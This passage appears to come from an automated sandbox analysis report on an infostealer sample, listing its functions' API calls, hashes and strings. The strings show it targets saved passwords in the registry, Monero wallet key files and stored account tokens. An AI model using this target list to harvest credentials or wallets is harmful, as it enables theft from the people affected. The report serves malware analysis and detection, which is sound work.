                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005C73B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005C740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005C7452
                        • HeapFree.KERNEL32(00000000), ref: 005C7459
                        • task.LIBCPMTD ref: 005C7555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: 53a2ce71ccfe7732ec3d48c5c0eb45858abdd0ed5634dc42af7c7481850ee330
                        • Instruction ID: 4f8034af8439c498a606e5236db01cc10ad42cc1e3bb28123f8b6bbca854008e
                        • Opcode Fuzzy Hash: 53a2ce71ccfe7732ec3d48c5c0eb45858abdd0ed5634dc42af7c7481850ee330
                        • Instruction Fuzzy Hash: BB61FDB590425D9FDB24DB90CC95FEABBB8BF48300F0081E9E689A6541DB705BC9CF91
                        Function 005CBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                        • lstrlen.KERNEL32(00000000), ref: 005CBC9F
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 005CBCCD
                        • lstrlen.KERNEL32(00000000), ref: 005CBDA5
                        • lstrlen.KERNEL32(00000000), ref: 005CBDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: bca8268236ed0248008b32b07abb4a902383e9857066c9564a287a75b5036f18
                        • Instruction ID: 97fb01a4c925a80f1c32b1d25c8bfe4ca3b415cd0a76343920596a76de759c39
                        • Opcode Fuzzy Hash: bca8268236ed0248008b32b07abb4a902383e9857066c9564a287a75b5036f18
                        • Instruction Fuzzy Hash: 34B153719101499BDF28EBA4CC9AEEF7B3CBF94300F40455BF50662291EF346A49CB66
                        Function 005D6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: b4ec31eb3121d5034e46a13dbc53388275780eb3303453ee86ac80e52d02c422
                        • Instruction ID: af776899914b3e909e1dfab3be41d38df50a1e6cdb54a872f836b4ca2709c3a8
                        • Opcode Fuzzy Hash: b4ec31eb3121d5034e46a13dbc53388275780eb3303453ee86ac80e52d02c422
                        • Instruction Fuzzy Hash: 53F05E3090430DEFD3A89FE0E90976C7B70FB04703F04819AE64986391D6704B429B96
                        Function 005C4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005C4FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C4FD1
                        • InternetOpenA.WININET(005E0DDF,00000000,00000000,00000000,00000000), ref: 005C4FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 005C5011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 005C5041
                        • InternetCloseHandle.WININET(?), ref: 005C50B9
                        • InternetCloseHandle.WININET(?), ref: 005C50C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 27d74d8ed553d39c2820a4f2c2c5d741791c7d733a3a530d131055bbfe80ffd5
                        • Instruction ID: c47a1d5912372211c520f9dd31e7701f03f645d3f02bd74b35c602491461fef6
                        • Opcode Fuzzy Hash: 27d74d8ed553d39c2820a4f2c2c5d741791c7d733a3a530d131055bbfe80ffd5
                        • Instruction Fuzzy Hash: F2310AB4A00218ABDB24CF94DC89BDDB7B4FB48704F5081D9EA09B7281D7706AC58F99
                        Function 005D83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 005D8426
                        • wsprintfA.USER32 ref: 005D8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 005D847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D8499
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,014B0078,00000000,000F003F,?,00000400), ref: 005D84EC
                        • lstrlen.KERNEL32(?), ref: 005D8501
                        • RegQueryValueExA.ADVAPI32(00000000,014B0288,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,005E0B34), ref: 005D8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: b8304ddb68edf9076df57f3239b07fa6396b3ab3bd1f03de0e629aeb720040e1
                        • Instruction ID: 18fa3ec30a8d1b8c2ee392b6ef63edac443298d98ffb5a6fb24f6cf4961c806f
                        • Opcode Fuzzy Hash: b8304ddb68edf9076df57f3239b07fa6396b3ab3bd1f03de0e629aeb720040e1
                        • Instruction Fuzzy Hash: 2B212A7191021CABDB68DB54DC85FE9B7B8FB48700F00C5DAE609A6280DF71AA85CFD4
                        Function 005D7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0149B878,00000000,00020119,00000000), ref: 005D76DD
                        • RegQueryValueExA.ADVAPI32(00000000,014B0300,00000000,00000000,?,000000FF), ref: 005D76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 024540c8c133855cdb3b711c3a424b0043a79a585969587b0dc45222e9aac406
                        • Instruction ID: 3d72ddb831efd2766b80325a596b9a644a284dabb87c12059c024bd1e00cb907
                        • Opcode Fuzzy Hash: 024540c8c133855cdb3b711c3a424b0043a79a585969587b0dc45222e9aac406
                        • Instruction Fuzzy Hash: 960162B5A04308BBD714DBE4DC49F6EBBB8FB48701F108456FA05E7291E6709940CB51
                        Function 005D7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0149B878,00000000,00020119,005D76B9), ref: 005D775B
                        • RegQueryValueExA.ADVAPI32(005D76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 005D777A
                        • RegCloseKey.ADVAPI32(005D76B9), ref: 005D7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 2fb00b84359578c3d45b7c1adc28332d7100f8a6e90e285ad60b4391c9ecd085
                        • Instruction ID: 02c0554660b7cbcce819c0366d84435d546b3bc849e13e83b0dd84802d6a929d
                        • Opcode Fuzzy Hash: 2fb00b84359578c3d45b7c1adc28332d7100f8a6e90e285ad60b4391c9ecd085
                        • Instruction Fuzzy Hash: 860167B5A40308BBD754DBE4DC49FBEB7B8FB48701F008555FA05A7281D67055008B52
                        Function 005D92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(:],80000000,00000003,00000000,00000003,00000080,00000000,?,005D3AEE,?), ref: 005D92FC
                        • GetFileSizeEx.KERNEL32(000000FF,:]), ref: 005D9319
                        • CloseHandle.KERNEL32(000000FF), ref: 005D9327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :]$:]
                        • API String ID: 1378416451-3251503520
                        • Opcode ID: b1887c20f6fdedd98eacee2a02e7dc39e938642f21176b82def8e85c113575d1
                        • Instruction ID: 61b089fd30c2be521c581ad534ac97a58019ef616f1951cbf1ded15b28e5d2c2
                        • Opcode Fuzzy Hash: b1887c20f6fdedd98eacee2a02e7dc39e938642f21176b82def8e85c113575d1
                        • Instruction Fuzzy Hash: 83F04F75E40308BBDB28DFB4DC49F9E7BF9BB48710F10CA55B651A72C0D67096018B41
                        Function 005C99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                        • LocalFree.KERNEL32(005C148F), ref: 005C9A90
                        • CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 14c8a19ed4938bd2712cb85e0ce1aef1975e4969a1543ea04b0eac88057a1490
                        • Instruction ID: 65a6980b1f881443123bf7b31724d091893cf3868f79eeecbdee9c61b5bc7339
                        • Opcode Fuzzy Hash: 14c8a19ed4938bd2712cb85e0ce1aef1975e4969a1543ea04b0eac88057a1490
                        • Instruction Fuzzy Hash: C23108B4A00209EFDB14CF94C989FAE7BB5FF48340F108158E911A7290D774AA41CFA1
                        Function 005D4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,014B0468), ref: 005D47DB
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4801
                        • lstrcat.KERNEL32(?,?), ref: 005D4820
                        • lstrcat.KERNEL32(?,?), ref: 005D4834
                        • lstrcat.KERNEL32(?,0149A450), ref: 005D4847
                        • lstrcat.KERNEL32(?,?), ref: 005D485B
                        • lstrcat.KERNEL32(?,014AF648), ref: 005D486F
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005D8D90: GetFileAttributesA.KERNEL32(00000000,?,005C1B54,?,?,005E564C,?,?,005E0E1F), ref: 005D8D9F
                          • Part of subcall function 005D4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005D4580
                          • Part of subcall function 005D4570: RtlAllocateHeap.NTDLL(00000000), ref: 005D4587
                          • Part of subcall function 005D4570: wsprintfA.USER32 ref: 005D45A6
                          • Part of subcall function 005D4570: FindFirstFileA.KERNEL32(?,?), ref: 005D45BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 6078114a35de81c8ba94e5bbd9ee71356e3ce9143fd5d2398968af0d813f18e6
                        • Instruction ID: fc560475d397fe028c6ca20650fb4147cf105d31121289bad936fb7d7809d3de
                        • Opcode Fuzzy Hash: 6078114a35de81c8ba94e5bbd9ee71356e3ce9143fd5d2398968af0d813f18e6
                        • Instruction Fuzzy Hash: 483191B6900309A7CB24FBB4DC89EED777CBB88300F40459AB35996181EE70D7898F95
                        Function 005D2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
